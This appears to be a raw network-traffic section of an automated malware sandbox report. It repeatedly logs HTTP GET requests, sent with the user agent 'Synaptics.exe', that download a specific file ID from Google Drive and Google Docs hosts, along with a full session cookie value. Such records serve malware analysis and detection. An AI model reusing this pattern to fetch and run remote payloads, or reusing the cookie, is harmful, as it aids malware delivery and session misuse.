                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
